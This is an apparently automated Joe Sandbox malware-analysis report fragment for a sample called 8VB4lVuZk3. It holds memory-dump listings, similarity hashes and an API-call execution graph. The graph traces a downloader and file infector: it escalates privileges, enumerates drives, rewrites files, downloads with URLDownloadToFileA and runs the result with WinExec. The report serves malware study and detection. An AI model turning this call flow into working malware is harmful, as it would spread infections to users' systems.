                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: Heap_free$CreateTime$AllocCompletionFileFreePortSystem__aulldiv__time64
                            • String ID:
                            • API String ID: 965951783-0
                            • Opcode ID: 248392a1f7630ccdaf3f9b0f50551526e4ca181af2277c33526712dfffcd10ec
                            • Instruction ID: ba1458ff3a8cf1d86880e87b87afbea2e2382aef0f37a54304d71ab515e53bf6
                            • Opcode Fuzzy Hash: 248392a1f7630ccdaf3f9b0f50551526e4ca181af2277c33526712dfffcd10ec
                            • Instruction Fuzzy Hash: 051170B1701A02ABD3419F6AE850746BAB0BF8031CF148325D424CBFD4EB76D5AD8BD1
                            APIs
                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 6C8E75B6
                            • DispatchMessageA.USER32(?), ref: 6C8E75D5
                            • TranslateMessage.USER32(?), ref: 6C8E75DC
                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 6C8E75EB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: Message$Peek$DispatchTranslate
                            • String ID:
                            • API String ID: 1795658109-0
                            • Opcode ID: bed5ba2ee096a71d9281e2501835952d3d76c3f416895fec8d0b8e3742590fd1
                            • Instruction ID: e85ad7b0aa336e3f8f18ab9d761c1e6beed7e442fdb32189a7b701217d05c05b
                            • Opcode Fuzzy Hash: bed5ba2ee096a71d9281e2501835952d3d76c3f416895fec8d0b8e3742590fd1
                            • Instruction Fuzzy Hash: 86F089717443057AED10DB54DD85F86B7BCAF85754F500411F754EB0C1E6B4E1058775
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID:
                            • String ID: Thread$Time
                            • API String ID: 0-1133082108
                            • Opcode ID: e155e63496b404203d63668b03ada18a6d0e0fe114a5b46653778fdff736e8dc
                            • Instruction ID: 7903ac005415fdcb43de34e3eae8c2ac77d0b6a499f8567301179050eb8b321e
                            • Opcode Fuzzy Hash: e155e63496b404203d63668b03ada18a6d0e0fe114a5b46653778fdff736e8dc
                            • Instruction Fuzzy Hash: 7F418E71608B419FD721DF28C850BAAB7F4BF99308F104E1DE8D697651EB30E548CB92
                            APIs
                            • ___from_strstr_to_strchr.LIBCMT ref: 6CA66181
                            • ___from_strstr_to_strchr.LIBCMT ref: 6CA661A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: ___from_strstr_to_strchr
                            • String ID: ..\..\..\async.c
                            • API String ID: 601868998-2050834500
                            • Opcode ID: 474d5faa8167466e74126cbb55218c0e96d754a54ac53a853583fac825c4337e
                            • Instruction ID: 702e48cb5e78148d4c23e79958245f422e247e47c1a9011874d10b4cd43549c2
                            • Opcode Fuzzy Hash: 474d5faa8167466e74126cbb55218c0e96d754a54ac53a853583fac825c4337e
                            • Instruction Fuzzy Hash: 65F0A432B453242BE7204698AC46B9673D89B45768F480221FA48EBB41E3A6A95543D1
                            APIs
                            Strings
                            • ..\..\..\async.c, xrefs: 6CA65C7C
                            • __redisShiftCallback(&ac->replies,NULL) == REDIS_ERR, xrefs: 6CA65C81
                            Memory Dump Source
                            • Source File: 00000000.00000002.2943336648.000000006C7A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C7A0000, based on PE: true
                            • Associated: 00000000.00000002.2943319489.000000006C7A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CCFA000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943883446.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943904565.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943918725.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943932489.000000006CF72000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2943946986.000000006CF77000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944003529.000000006CF79000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944022692.000000006CF91000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944038142.000000006CF93000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944052019.000000006CF97000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944067263.000000006CF98000.00000008.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944088790.000000006CFB6000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBC000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFBF000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFC9000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFD8000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006CFE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D000000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D005000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944124609.000000006D009000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000000.00000002.2944368391.000000006D021000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6c7a0000_8VB4lVuZk3.jbxd
                            Similarity
                            • API ID: _free
                            • String ID: ..\..\..\async.c$__redisShiftCallback(&ac->replies,NULL) == REDIS_ERR
                            • API String ID: 269201875-3972503695
                            • Opcode ID: 3c78569071251cd30f2410591de4680733e0e72c96eec0e3d9d0e70eb17b9c18
                            • Instruction ID: e21d68264fb3761328a12fd2bde0918bfbf7072aa840df00b3a7c6bebc7987cb
                            • Opcode Fuzzy Hash: 3c78569071251cd30f2410591de4680733e0e72c96eec0e3d9d0e70eb17b9c18
                            • Instruction Fuzzy Hash: 39F03075601B10CBE7259F39C850BDBB7E0BF05318F54092ED2AB97E41D77164848B80

                            Execution Graph

                            Execution Coverage:32.5%
                            Dynamic/Decrypted Code Coverage:10.4%
                            Signature Coverage:10.4%
                            Total number of Nodes:297
                            Total number of Limit Nodes:12
                            execution_graph 1017 6b6158 VirtualFree 1021 6b60c7 1017->1021 1018 6b6198 VirtualFree 1022 6b61b2 1018->1022 1019 6b60d5 VirtualAlloc 1019->1021 1020 6b6389 VirtualProtect 1026 6b63b7 1020->1026 1021->1018 1021->1019 1025 6b615f VirtualFree 1021->1025 1022->1020 1028 6b62fb 1022->1028 1023 6b63fc VirtualProtect 1024 6b6400 1023->1024 1025->1021 1026->1023 1027 6b63e7 VirtualProtect 1026->1027 1027->1023 1027->1026 1029 6b14e1 1030 6b14fd GetModuleHandleA 1029->1030 1031 6b1541 1029->1031 1034 6b151a VirtualQuery 1030->1034 1035 6b1512 1030->1035 1032 6b1549 1031->1032 1033 6b1573 1031->1033 1036 6b1566 1032->1036 1057 6b1af9 1032->1057 1040 6b1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1033->1040 1034->1035 1035->1031 1038 6b1579 ExitProcess 1041 6b167a 1040->1041 1042 6b167f 1040->1042 1075 6b139f GetVersionExA 1041->1075 1063 6b1718 GetSystemTimeAsFileTime 1042->1063 1045 6b1686 1046 6b16ca 1045->1046 1052 6b16a0 CreateThread 1045->1052 1047 6b16d0 1046->1047 1048 6b16d7 1046->1048 1096 6b1581 1047->1096 1050 6b170f 1048->1050 1051 6b16dd lstrcpy 1048->1051 1050->1038 1051->1038 1068 6b2c48 memset 1052->1068 1312 6b1099 1052->1312 1056 6b1718 3 API calls 1056->1046 1058 6b1b09 1057->1058 1059 6b1b11 1057->1059 1060 6b1638 188 API calls 1058->1060 1061 6b1b16 CreateThread 1059->1061 1062 6b1b0f 1059->1062 1060->1062 1061->1062 1331 6b1638 189 API calls 1061->1331 1062->1036 1062->1062 1064 6b1735 SHSetValueA 1063->1064 1065 6b1754 1063->1065 1067 6b1786 __aulldiv 1064->1067 1066 6b175a SHGetValueA 1065->1066 1065->1067 1066->1067 1067->1045 1102 6b1973 PathFileExistsA 1068->1102 1071 6b2cb2 1073 6b2cbb VirtualFree 1071->1073 1074 6b16ba WaitForSingleObject 1071->1074 1072 6b2c8f CreateThread WaitForMultipleObjects 1072->1071 1124 6b2b8c memset GetLogicalDriveStringsA 1072->1124 1073->1074 1074->1056 1076 6b14da 1075->1076 1077 6b13cf LookupPrivilegeValueA 1075->1077 1076->1042 1078 6b13ef 1077->1078 1079 6b13e7 1077->1079 1078->1076 1297 6b120e GetModuleHandleA GetProcAddress 1078->1297 1292 6b119f GetCurrentProcess OpenProcessToken 1079->1292 1085 6b1448 GetCurrentProcessId 1085->1076 1086 6b1457 1085->1086 1086->1076 1087 6b1319 3 API calls 1086->1087 1088 6b147f 1087->1088 1089 6b1319 3 API calls 1088->1089 1090 6b148e 1089->1090 1090->1076 1091 6b1319 3 API calls 1090->1091 1092 6b14b4 1091->1092 1093 6b1319 3 API calls 1092->1093 1094 6b14c3 1093->1094 1095 6b1319 3 API calls 1094->1095 1095->1076 1311 6b185b GetSystemTimeAsFileTime srand rand srand rand 1096->1311 1098 6b1592 wsprintfA wsprintfA lstrlen CreateFileA 1099 6b15fb WriteFile CloseHandle 1098->1099 1100 6b1633 1098->1100 1099->1100 1101 6b161d ShellExecuteA 1099->1101 1100->1050 1101->1100 1103 6b19a0 1102->1103 1119 6b1ac7 1102->1119 1104 6b19af CreateFileA 1103->1104 1105 6b1a28 GetFileSize 1104->1105 1106 6b19c4 Sleep 1104->1106 1108 6b1a38 1105->1108 1109 6b1a80 1105->1109 1106->1104 1107 6b19d5 1106->1107 1123 6b185b GetSystemTimeAsFileTime srand rand srand rand 1107->1123 1108->1109 1111 6b1a3d VirtualAlloc 1108->1111 1112 6b1a8d FindCloseChangeNotification 1109->1112 1113 6b1a96 1109->1113 1111->1109 1115 6b1a53 1111->1115 1112->1113 1116 6b1aad 1113->1116 1117 6b1a9c DeleteFileA 1113->1117 1114 6b19da wsprintfA CopyFileA 1114->1105 1120 6b1a0d CreateFileA 1114->1120 1115->1109 1121 6b1a59 ReadFile 1115->1121 1116->1119 1122 6b1ab8 VirtualFree 1116->1122 1117->1116 1119->1071 1119->1072 1120->1105 1120->1117 1121->1109 1121->1115 1122->1119 1123->1114 1125 6b2c09 WaitForMultipleObjects 1124->1125 1130 6b2bc8 1124->1130 1127 6b2c2a CreateThread 1125->1127 1128 6b2c3c 1125->1128 1126 6b2bfa lstrlen 1126->1125 1126->1130 1127->1128 1135 6b2845 1127->1135 1129 6b2bd2 GetDriveTypeA 1129->1126 1129->1130 1130->1126 1130->1129 1131 6b2be3 CreateThread 1130->1131 1131->1126 1132 6b2b7d 1131->1132 1145 6b29e2 memset wsprintfA 1132->1145 1282 6b274a memset memset SHGetSpecialFolderPathA wsprintfA 1135->1282 1137 6b2878 DeleteFileA 1139 6b289a 1137->1139 1140 6b288c VirtualFree 1137->1140 1138 6b2853 1138->1137 1141 6b2692 8 API calls 1138->1141 1144 6b239d 186 API calls 1138->1144 1142 6b28ab 1139->1142 1143 6b28a4 CloseHandle 1139->1143 1140->1139 1141->1138 1143->1142 1144->1138 1146 6b2a3a memset lstrlen lstrcpyn strrchr 1145->1146 1147 6b2abc memset memset FindFirstFileA 1145->1147 1146->1147 1149 6b2a88 1146->1149 1159 6b28b8 memset wsprintfA 1147->1159 1149->1147 1151 6b2a9a lstrcmpiA 1149->1151 1152 6b2aad lstrlen 1151->1152 1153 6b2b74 1151->1153 1152->1147 1152->1151 1154 6b2b61 FindNextFileA 1155 6b2b6d FindClose 1154->1155 1156 6b2b23 1154->1156 1155->1153 1157 6b2b35 lstrcmpiA 1156->1157 1158 6b28b8 174 API calls 1156->1158 1157->1155 1157->1156 1158->1154 1160 6b2951 memset 1159->1160 1161 6b2905 1159->1161 1160->1154 1161->1160 1162 6b291b memset wsprintfA 1161->1162 1163 6b2956 strrchr 1161->1163 1164 6b29e2 180 API calls 1162->1164 1163->1160 1165 6b2967 lstrcmpiA 1163->1165 1164->1160 1166 6b297a 1165->1166 1167 6b2988 lstrcmpiA 1165->1167 1177 6b1e6e 1166->1177 1167->1160 1169 6b2994 1167->1169 1170 6b29ad strstr 1169->1170 1171 6b29a5 lstrcpy 1169->1171 1172 6b29cb 1170->1172 1173 6b29d3 1170->1173 1171->1170 1220 6b239d strstr 1172->1220 1242 6b2692 1173->1242 1178 6b1e7d 1177->1178 1251 6b1df6 strrchr 1178->1251 1181 6b2332 1185 6b233d UnmapViewOfFile 1181->1185 1186 6b2346 1181->1186 1182 6b1eb0 SetFileAttributesA CreateFileA 1182->1181 1183 6b1edf 1182->1183 1256 6b1915 1183->1256 1185->1186 1187 6b234b FindCloseChangeNotification 1186->1187 1188 6b2350 1186->1188 1187->1188 1190 6b2391 1188->1190 1191 6b2356 CloseHandle 1188->1191 1190->1160 1191->1190 1192 6b1f2e 1192->1181 1262 6b1c81 1192->1262 1196 6b1f92 1197 6b1c81 2 API calls 1196->1197 1198 6b1f9f 1197->1198 1198->1181 1199 6b1af9 169 API calls 1198->1199 1200 6b2024 1198->1200 1204 6b1fc0 1199->1204 1200->1181 1201 6b1af9 169 API calls 1200->1201 1202 6b207a 1201->1202 1203 6b1af9 169 API calls 1202->1203 1208 6b2090 1203->1208 1204->1181 1204->1200 1205 6b1af9 169 API calls 1204->1205 1206 6b1ffe 1205->1206 1207 6b2013 FlushViewOfFile 1206->1207 1207->1200 1209 6b20bb memset memset 1208->1209 1210 6b20f5 1209->1210 1211 6b1c81 2 API calls 1210->1211 1212 6b21de 1211->1212 1213 6b2226 memcpy UnmapViewOfFile FindCloseChangeNotification 1212->1213 1267 6b1b8a 1213->1267 1215 6b226e 1275 6b185b GetSystemTimeAsFileTime srand rand srand rand 1215->1275 1217 6b22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1218 6b1915 3 API calls 1217->1218 1219 6b231f FindCloseChangeNotification 1218->1219 1219->1181 1221 6b2451 CreateFileA GetFileSize 1220->1221 1227 6b23d8 1220->1227 1222 6b2480 1221->1222 1223 6b2675 CloseHandle 1221->1223 1222->1223 1225 6b2499 1222->1225 1224 6b267c RemoveDirectoryA 1223->1224 1226 6b2687 1224->1226 1228 6b1915 3 API calls 1225->1228 1226->1160 1227->1221 1227->1226 1229 6b24a4 9 API calls 1228->1229 1277 6b189d memset CreateProcessA 1229->1277 1232 6b255c Sleep memset wsprintfA 1233 6b29e2 163 API calls 1232->1233 1234 6b2597 memset wsprintfA Sleep 1233->1234 1235 6b189d 6 API calls 1234->1235 1236 6b25e4 Sleep CreateFileA 1235->1236 1237 6b1915 3 API calls 1236->1237 1238 6b2610 CloseHandle 1237->1238 1238->1224 1239 6b261e 1238->1239 1239->1224 1240 6b2641 SetFilePointer WriteFile 1239->1240 1240->1224 1241 6b2667 SetEndOfFile 1240->1241 1241->1224 1243 6b26b2 WaitForSingleObject 1242->1243 1244 6b26a2 CreateEventA 1242->1244 1245 6b2708 1243->1245 1246 6b26c1 lstrlen ??2@YAPAXI 1243->1246 1244->1243 1248 6b2736 SetEvent 1245->1248 1250 6b2718 lstrcpy ??3@YAXPAX 1245->1250 1247 6b26da lstrcpy 1246->1247 1246->1248 1249 6b26f1 1247->1249 1248->1160 1249->1248 1250->1249 1252 6b1e13 lstrcpy strrchr 1251->1252 1253 6b1e62 1251->1253 1252->1253 1254 6b1e40 lstrcmpiA 1252->1254 1253->1181 1253->1182 1254->1253 1255 6b1e52 lstrlen 1254->1255 1255->1253 1255->1254 1257 6b1928 1256->1257 1260 6b1924 SetFilePointer CreateFileMappingA MapViewOfFile 1256->1260 1258 6b194f 1257->1258 1259 6b192e memset GetFileTime 1257->1259 1258->1260 1261 6b1954 SetFileTime 1258->1261 1259->1260 1260->1181 1260->1192 1261->1260 1263 6b1c9c 1262->1263 1265 6b1c94 1262->1265 1264 6b1cae memset memset 1263->1264 1263->1265 1264->1265 1265->1181 1266 6b185b GetSystemTimeAsFileTime srand rand srand rand 1265->1266 1266->1196 1269 6b1b93 1267->1269 1276 6b185b GetSystemTimeAsFileTime srand rand srand rand 1269->1276 1270 6b1bca srand 1271 6b1bd8 rand 1270->1271 1272 6b1c08 1271->1272 1272->1271 1273 6b1c29 memset memcpy lstrcat 1272->1273 1273->1215 1275->1217 1276->1270 1278 6b190c 1277->1278 1279 6b18e0 CloseHandle WaitForSingleObject 1277->1279 1278->1224 1278->1232 1280 6b18fb GetExitCodeProcess 1279->1280 1281 6b1907 CloseHandle 1279->1281 1280->1281 1281->1278 1291 6b185b GetSystemTimeAsFileTime srand rand srand rand 1282->1291 1284 6b27b5 wsprintfA CopyFileA 1285 6b27de wsprintfA 1284->1285 1286 6b2840 1284->1286 1287 6b1973 17 API calls 1285->1287 1286->1138 1288 6b280f 1287->1288 1289 6b2813 DeleteFileA 1288->1289 1290 6b2820 CreateFileA 1288->1290 1289->1290 1290->1286 1291->1284 1293 6b1200 CloseHandle 1292->1293 1294 6b11c6 AdjustTokenPrivileges 1292->1294 1293->1078 1295 6b11f7 CloseHandle 1294->1295 1296 6b11f6 1294->1296 1295->1293 1296->1295 1298 6b123f GetCurrentProcessId OpenProcess 1297->1298 1299 6b1310 1297->1299 1298->1299 1300 6b1262 1298->1300 1299->1076 1306 6b1319 1299->1306 1301 6b12b0 VirtualAlloc 1300->1301 1302 6b12f1 CloseHandle 1300->1302 1304 6b1296 VirtualFree 1300->1304 1305 6b12b8 1300->1305 1301->1300 1301->1305 1302->1299 1303 6b1302 VirtualFree 1302->1303 1303->1299 1304->1301 1305->1302 1307 6b134a 1306->1307 1308 6b132a GetModuleHandleA GetProcAddress 1306->1308 1309 6b1363 1307->1309 1310 6b1351 memset 1307->1310 1308->1307 1308->1309 1309->1076 1309->1085 1310->1309 1311->1098 1313 6b1196 1312->1313 1314 6b10ba 1312->1314 1314->1313 1330 6b185b GetSystemTimeAsFileTime srand rand srand rand 1314->1330 1316 6b1118 wsprintfA wsprintfA URLDownloadToFileA 1317 6b1168 lstrlen Sleep 1316->1317 1318 6b10dc 1316->1318 1317->1314 1321 6b1000 CreateFileA 1318->1321 1322 6b1092 WinExec lstrlen 1321->1322 1323 6b1025 GetFileSize CreateFileMappingA MapViewOfFile 1321->1323 1322->1313 1322->1314 1324 6b107b 1323->1324 1325 6b1057 1323->1325 1326 6b108d CloseHandle 1324->1326 1327 6b1087 CloseHandle 1324->1327 1328 6b1061 1325->1328 1329 6b1074 UnmapViewOfFile 1325->1329 1326->1322 1327->1326 1328->1329 1329->1324 1330->1316 1346 6b2361 1347 6b236b UnmapViewOfFile 1346->1347 1348 6b2374 1346->1348 1347->1348 1349 6b2379 CloseHandle 1348->1349 1350 6b2382 1348->1350 1349->1350 1351 